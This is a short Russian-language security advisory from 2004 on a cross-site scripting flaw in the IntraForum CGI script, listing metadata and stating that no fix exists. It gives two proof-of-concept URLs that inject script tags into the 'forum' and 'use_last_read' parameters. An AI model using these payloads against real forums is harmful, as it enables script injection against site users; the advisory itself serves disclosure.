Межсайтовый скриптинг в IntraForum

Дата публикации:
27.01.2004
Дата изменения:
27.01.2004
Всего просмотров:
847
Опасность:
Низкая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: IntraForum

Описание: Уязвимость обнаружена в IntraForum. Удаленный пользователь может выполнить XSS нападение.

Пример/Эксплоит:

http://[target]/cgi-bin/forumsdb/intraforum_db.cgi?forum= <script>alert('sda')<
/script>&read=&alias=&redir_flag=true

http://[target]/cgi-bin/forumsdb/intraforum_db.cgi?forum=7940&alias=dbr&read=0
00965-000964&session=FFFF& use_last_read="><script>alert('XSS')</script>

URL производителя: http://diburim.co.il/

Решение:qСпособов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Inrtra Forum Cross Site Scripting Vulnerabillity

или введите имя

CAPTCHA